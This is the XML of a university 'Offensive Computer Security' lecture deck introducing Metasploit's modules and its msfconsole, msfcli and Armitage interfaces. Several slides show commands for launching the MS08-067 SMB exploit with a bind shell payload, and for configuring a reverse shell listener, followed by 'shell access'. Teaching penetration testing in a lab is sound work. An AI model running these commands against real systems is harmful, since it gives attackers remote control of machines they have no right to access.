<file path=ppt/slides/_rels/slide79.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide79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8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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3.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image09.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/><Relationship Target="../media/image12.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide80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46.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide81.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide81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49.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide82.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide82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83.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide83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84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide84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85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide85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50.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide86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54.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide87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88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide88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89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide89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45.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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90.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide90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48.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide91.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide91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51.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide92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57.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide93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52.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide94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53.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3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" name="Shape 2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pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Shape 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3112" x="-206426"/>
            <a:ext cy="6851774" cx="9556852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Shape 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5310737" x="1371600"/>
            <a:ext cy="1046400" cx="77724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algn="r" rtl="0"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CIS 4930 / CIS 5930</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="0"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Offensive Computer Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="0"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Spring 2014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5" name="Shape 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903219" x="1402171"/>
            <a:ext cy="1550731" cx="63396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" name="Shape 8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89" name="Shape 89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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: in general is a piece of software that can be used by the MSF.  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auxiliary modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>an exploit without a payload is an auxiliary module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is a component in MSF that waits for incoming connections of some sort.  Commonly used with connect-back ("reverse") exploit modules.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 90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Metasploit terminology</a:t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" name="Shape 9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pic>
        <p:nvPicPr>
          <p:cNvPr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52400" x="1535235"/>
            <a:ext cy="6190723" cx="6073529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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6349600" x="389425"/>
            <a:ext cy="486900" cx="85023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u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>From http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture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 filesystem architecture</a:t>
            </a:r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Pretty intuitive in layout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data: editable files used by Metasploit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documentation: provides documentation for the framework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external: source code and third-party libraries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lib: the 'meat' of the framework code base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modules: the actual MSF modules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plugins: plugins that can be loaded at run-time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scripts: Meterpreter and other scripts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tools: various useful command-line utilities</a:t>
            </a:r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" name="Shape 10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 main libraries</a:t>
            </a:r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MSF::Core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Basic API for the framework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Defines MSF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rPr lang="en"/>
              <a:t>MSF::Base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Provides a friendlier API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simplifies MSF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" name="Shape 11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Modules and Locations</a:t>
            </a:r>
          </a:p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Primary modules located in Backtrack5 at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/opt/metasploit/msf3/modules/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rPr lang="en"/>
              <a:t>User defined modules are stored:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>~/.msf4/modules/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" name="Shape 12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Modules</a:t>
            </a:r>
          </a:p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Exploits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Any module that uses payloads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Payloads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stand-alone payload catalogue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Encoders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payload encoders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NOPS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nop sled modules keep payload sizes consistent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Auxiliary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misc modules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also exploits that don't use payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Post exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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" name="Shape 12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pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Shape 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52400" x="1535235"/>
            <a:ext cy="6190723" cx="607352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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6349600" x="389425"/>
            <a:ext cy="486900" cx="85023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u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>From http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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" name="Shape 13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5" name="Shape 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3786737" x="685800"/>
            <a:ext cy="1046400" cx="77724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sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2655750" x="685800"/>
            <a:ext cy="1546500" cx="77724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Metasploit Interfaces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" name="Shape 14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41" name="Shape 141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MSFconsole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MSFcli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Armitage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142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Metasploit framework interfaces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr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852149" x="3767329"/>
            <a:ext cy="4831650" cx="49194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" name="Shape 14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48" name="Shape 148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="35729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most popular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command line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most flexible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feature-rich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most supported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>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only interface that supports plugins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9" name="Shape 149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MSFconsole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150" name="Shape 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600337" x="4065791"/>
            <a:ext cy="5058237" cx="4925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" name="Shape 2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Outline</a:t>
            </a:r>
          </a:p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Overview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Metasploit Interfaces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Metasploit Database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Metasploit Utilities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Social Engineer Toolkit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" name="Shape 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3310800" x="2946550"/>
            <a:ext cy="1546500" cx="77724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b="0" sz="1200"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MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMMMMMMMM                MMMMMMMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMN$                           vMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNl  MMMMM             MMMMM  JMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNl  MMMMMMMN       NMMMMMMM  JMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMR  ?MMNM             MMMMM .dMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMNm `?MMM             MMMM` dMMMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMMMN  ?MM             MM?  NMMMMMN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMMMMMNe                 JMMMMMNMMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMMMMMMMNm,            eMMMMMNMMNMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="1200"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MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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" name="Shape 15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55" name="Shape 155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To access msfconsole's help files, enter help followed by the command you are interested in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help vulns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help connect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help route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help use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To show options for utilities / modules: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show exploits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show payloads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show auxiliary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To search for exploits/modules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search XYZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" marL="45720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" name="Shape 156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MSFconsole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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" name="Shape 16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61" name="Shape 161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MSFconsole</a:t>
            </a:r>
          </a:p>
        </p:txBody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To make use of a particular module, issue the 'use' command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use windows/shell_reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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the console will navigate to the context of that module:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="Shape 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3613850" x="457200"/>
            <a:ext cy="1971675" cx="627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" name="Shape 16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68" name="Shape 168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MSFconsole</a:t>
            </a:r>
          </a:p>
        </p:txBody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In the context of a module, you can show its options.  Also 'info' provides more detail...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Set them also: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set LHOST A.B.C.D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set LPORT 6666</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="170" name="Shape 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3613850" x="457200"/>
            <a:ext cy="1971675" cx="627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" name="Shape 17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75" name="Shape 175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MSFconsole</a:t>
            </a:r>
          </a:p>
        </p:txBody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Issue the 'back' command to navigate to the previous context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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when in doubt... back is your friend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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" name="Shape 18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81" name="Shape 181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MSFconsole example</a:t>
            </a:r>
          </a:p>
        </p:txBody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pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Shape 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471612" x="457200"/>
            <a:ext cy="2847975" cx="444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4319587" x="457200"/>
            <a:ext cy="400050" cx="404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" name="Shape 18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89" name="Shape 189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MSFconsole example</a:t>
            </a:r>
          </a:p>
        </p:txBody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Some exploit modules support a 'check' option that attempts to test if the set target is vulnerable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Shape 1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3203525" x="457200"/>
            <a:ext cy="2286000" cx="58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" name="Shape 19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96" name="Shape 196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MSFconsole example</a:t>
            </a:r>
          </a:p>
        </p:txBody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Boom</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="198" name="Shape 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2618675" x="457200"/>
            <a:ext cy="2171700" cx="792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" name="Shape 20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03" name="Shape 203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command line interface for MSF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designed for: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scripting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use with other tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can pipe input / output of tools and MSFcli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not as user friendly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4" name="Shape 204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MSFcli</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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" name="Shape 20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09" name="Shape 209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Victim setup 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screenshot </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 210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MSFcli example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="211" name="Shape 2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600337" x="3647268"/>
            <a:ext cy="4641846" cx="5039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" name="Shape 21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16" name="Shape 216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Example of help options for a specific exploit (ms08_067_netapi)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using O (captial o) in place of any flag with msfcli will display the options / help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7" name="Shape 217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MSFcli example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="Shape 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3703140" x="457200"/>
            <a:ext cy="1476375" cx="598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" name="Shape 3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Disclaimer / Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody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This class nor FSU has any affiliation with the Offensive Security Team </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.offensive-security.com/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The examples / screenshots are specific to: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Backtrack5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Metasploit Framework version 4.6.0-dev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Social Engineer Toolkit version 4.7.2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i="1"/>
              <a:t>And as always, act responsibly, you alone are responsible for how you use this information </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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" name="Shape 22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23" name="Shape 223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We have to set 3 options for this exploit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RHOST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RPORT (can be left as the default 445)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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SMBPIPE (can also be left as the default)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Shape 224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MSFcli example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="225" name="Shape 2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3722365" x="457200"/>
            <a:ext cy="1476375" cx="598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" name="Shape 22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30" name="Shape 230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Now determine the available payloads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Shape 231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MSFcli example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="232" name="Shape 2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2784275" x="457200"/>
            <a:ext cy="3481495" cx="82702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" name="Shape 23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37" name="Shape 237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sz="1200" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    The E at the end tells it to execute.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Working in progress:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238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MSFcli example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Shape 2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2765400" x="457200"/>
            <a:ext cy="3790950" cx="770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" name="Shape 24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44" name="Shape 244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Successful exploit, shell access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 245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MSFcli example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="Shape 2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3451190" x="457200"/>
            <a:ext cy="3048000" cx="618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" name="Shape 25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51" name="Shape 251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Fully interactive GUI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designed by Raphael Mudge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point and click pwnage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run from command line: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armitage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Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, scripts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written in Cortana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A language based off of Sleep (which is a language similar to perl, and bash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>recent update supports scripting of 3rd party tools, and communication between bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" indent="-342900" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>botnets!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252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Armitage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="253" name="Shape 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274637" x="7175500"/>
            <a:ext cy="1777999" cx="1511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" name="Shape 25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58" name="Shape 258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Armitage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Shape 259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Its fun to use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won't provide as much functionality as msfconsole or msfcli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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also defaults to 32-bit for payloads/exploits AFAIK -- which is a pain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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" name="Shape 26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64" name="Shape 264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sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 265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Armitage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="266" name="Shape 2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583539" x="1371600"/>
            <a:ext cy="4991100" cx="6400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0" name="Shape 27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71" name="Shape 271"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3786737" x="685800"/>
            <a:ext cy="1046400" cx="77724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  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Shape 272"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2111123" x="685800"/>
            <a:ext cy="1546500" cx="77724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Metasploit database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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" name="Shape 27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77" name="Shape 277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The database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
